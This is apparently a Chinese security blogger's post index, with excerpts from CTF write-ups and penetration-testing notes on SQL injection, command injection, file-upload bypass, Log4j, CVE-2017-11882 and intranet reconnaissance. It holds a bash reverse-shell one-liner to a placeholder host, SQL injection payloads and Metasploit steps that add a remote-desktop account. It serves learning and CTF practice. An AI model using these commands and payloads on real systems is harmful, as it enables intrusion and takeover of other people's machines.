- 博客(18)
- 问答 (1)
- 收藏
- 关注
原创 ctfshow单身狗 -- web
看到入参file判断项是strrev(反转)==正常入参刚开始考虑过弱等于绕过,但是include没啥用,后来了解到2个知识点,,1.第一可以利用data//伪协议,2.php?>后的内容不再进行运算所以可以构造如下file=data?>通过py反转构造完整payload签到题这么难?签到题不应该是有手就行的那种吗。...
2022-07-21 13:07:20 568
原创 Apache Log4j任意代码执行复现
这里会报错提示Exceptioninthread"LDAPListenerclientconnectionreader的错误。这里主要说明因为java版本使用java1.8.02导致复现失败,遇到的问题。这里下载对应服务器版本的8u201的版本。然后就可以正常使用了。...
2022-07-20 16:34:16 587
转载 CTF常见加密方式JS
一、密码学基本简介密码学(在西欧语文中,源于希腊语kryptós“隐藏的”,和gráphein“书写”)是研究如何隐密地传递信息的学科。在现代特别指对信息以及其传输的数学性研究,常被认为是数学和计算机科学的分支,和信息论也密切相关。著名的密码学者Ron Rivest解释道:“密码学是关于如何在敌人存在的环境中通讯”,自工程学的角度,这相当于密码学与纯数学的异同。密码学是信息安全等相关议题,如认证、访问控制的核心。密码学的首要目的是隐藏信息的涵义,并不是隐藏信息的存在。密码学也促进了计算机
2021-10-09 14:02:09 2415
转载 反弹shell的N种姿势
0x00 前言在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。0x01 Bash反弹1.1 方法一攻击者主机上执行监听:nc -lvvp port目标主机上执行:bash -i >& /dev/tcp/x.x.x.x/port 0>&1#bash -i 打开一
2021-10-09 13:36:50 292
原创 内网信息收集总结
前言本文记录一些内网渗透的注意点,信息比较散乱,后续更新完善本机信息查询:常用信息本机服务列表wmic service list brief本机进程列表Tasklist /v浏览器代理信息reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"RDP端口号(16进制)reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
2021-10-09 13:30:27 446
转载 命令注入绕过方式总结
前言命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。常用符号分号(;)多条语句顺序执行时的分割符号。cmd1;cmd2管道符(|)cmd1命令的输出,作为下一条命令cmd2的参数。cmd1|cmd2and(&&)与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2cmd1 && cmd2
2021-10-09 11:35:22 1761
转载 常见WAF拦截页面总结
(1) D盾(2) 云锁(3) UPUPW安全防护(4) 宝塔网站防火墙(5) 网防G01(6) 护卫神(7) 网站安全狗(8) 智创防火墙(9) 360主机卫士或360webscan(10) 西数WTS-WAF(11) Naxsi WAF(12) 腾讯云(13) 腾讯宙斯盾(14) 百度云(15) 华为云(16) 网宿云...
2021-10-09 11:00:09 1830
转载 Linux入侵应急响应与排查
入侵者在入侵成功后,往往会留下后门以便再次访问被入侵的系统, 而创建系统账号是一种比较常见的后门方式。查询特权用户特权用户(uid 为0)awk -F: '$3==0{print $1}' /etc/passwd查找远程可以登录的账户awk '/\$1|\$5|\$6/{print $1}' /etc/shadow $1:MD5(长度 22个字符) $5:SHA-256(长度 43 个字符) $6:SHA-512(长度86 个字符) 检查sudo权限
2021-10-09 10:40:57 165
转载 Windows 系统下实现间接命令执行
0x00 前言最近学习看到了关于Windows系统下实现间接命令执行的文章。某些情况下,可以使用非cmd.exe的一些自带的程序文件来执行命令,常见的场景就是逃避检测,绕过一些HIDS,看到国外的文章讲的是可以绕过应用程序白名单产品。具体可利用于哪些场景还得靠表哥们研究下。这里直接就用找到的一些例子来测试下。0x01 操作1.forfilesforfiles是一款windows平台的软件工具,其中选择文件并运行一个命令来操作文件。实际需要执行的命令是通...
2021-10-09 09:34:53 1030
原创 NSCTF-web题目writeup
Dream II看题目提示的仔细看用什么提示方式,页面进去提示了“put me a message then you can get the flag”说明重点就是怎么把信息传过去,这里可以先测试GET POST请求会发现都不行 所以重点就是这个“PUT”这个词 所以用burpsuite 用PUT方式丢一个“message”的数据包得到如下图:看了一眼觉得是base64加密WECLOME查看源代码找到了前面的flag抓个包看一下抓包拼接就可以获得flag...
2021-10-01 16:49:47 1152
原创 南京邮电大学CTF题目writeup (二) 含题目地址
Pass-01题目地址:http://nctf.nuptzj.cn/web15/看题目就是一个登录失败的提示"Invalid password!"通过查看源代码 可见如下图:#GOAL: login as admin,then get the flag;error_reporting(0);require 'db.inc.php';function clean($str){ if(get_magic_quotes_gpc()){ $str=stripslashes($str)
2021-09-30 23:06:41 656
原创 南京邮电大学CTF题目writeup (一) 含题目地址
题目地址:http://nctf.nuptzj.cn/Pass-01进去就说我不是admin 所以肯定是破解admin的账户密码拿到flag 点击下面的源码<?phpif($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); //连接数据库 mysql_select_db(S
2021-09-30 17:19:34 1061
原创 极客大挑战2019-SQL注入五题PW
01、[极客大挑战2019]EasysQL02、[极客大挑战2019]LovesQL03、[极客大挑战2019]BabysQL04、[极客大挑战2019]HardsQL05、[极客大挑战2019]FinalsQLPass-01第一题无须太多花里胡哨的直接就是万能密码payload:admin' or 1=1 -- qwePass-02题目提示 不在当前表 直接先用万能密码测试闭合提示登录成功 说明闭合是没有问题的 那么下面就是判断其他...
2021-09-23 23:29:48 1313
原创 Prime_Series靶场从探测到提权
靶场开机就这 做的是NET的网卡跟我kali是一个网络 网络 192.168.34.0的题目要求是同C段但是不知道ip地址故直接nmap 扫描 目标服务器ip地址和开放服务和端口没啥技术含量 可以看见ip为192.168.34.130的开放了 22 80 的2个服务 且网络容器是apachedrib这里直接爆破目录可见是一个wordpress的系统 二次扫描 -X 参数 [.txt][.php]的意思在爆破后缀添加 以.txt结尾和.php结...
2021-09-15 23:46:51 1195
原创 文件上传漏洞总结
1.前端用js判断后端不检验,直接抓包绕过;2.Content-type字段可以修改绕过;3.危险可执行文件后缀:.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.a
2021-08-02 12:53:31 680
原创 万变不离其宗-掌控者靶场之bluecms1.6漏洞
拿到题 睁大眼就能看见底下的 bluecms 1.6 百度了一下漏洞位置 学习了PW的姿势SQL注入位置http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1Order by 7 字段长度为7注入表名payload:ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(table_name)%20from%20information_sc..
2021-07-26 19:13:48 2897 1
原创 CVE_2017_11882漏洞复现(Metasploit开启NT远程桌面添加账户)
靶机安装windows office 20162.rb复制文件到攻击机的msf的模块文件下并刷新这里注意:msf放到库文件下 不能用- 只能用下划线 _ 不然刷新库 不认3.设置参数 运行并生成 木马doc4.运行监听 靶机执行木马注意: 这边连接后并不会直接回显,需要用seesions –i 1的方式来链接反弹5.开启远程桌面 run post/windows/manage/enable_rdp6.添加远程桌面密码run pos...
2021-07-05 22:16:18 293
原创 记某淘宝客软件分析拿库思路
之前的一个客户丢过来了一个程序,说研究一下原理,他是怎么采集到淘宝,让我研究一下原理,采集这东西现在已经不是难题,无论是python采集还是通过websocket我觉得都是可以实现的,毕竟现在对于ua检测已经没有之前那么严格了。直接我就给他丢OD里面先看加壳情况。目前看来还是很顺利啊没有出现任何报错,然后我就进行断句什么的然后就发现自己对exe的反破解确实有点难顶,,果然走我web的方式第一思路永远就是看他怎么传值的,,既然没有加壳那就不用考虑脱壳这种麻烦事,...
2021-07-03 19:24:43 296
空空如也
centos系统进不去修复怎么修复 一直下划线
2020-08-09
TA创建的收藏夹 TA关注的收藏夹
TA关注的人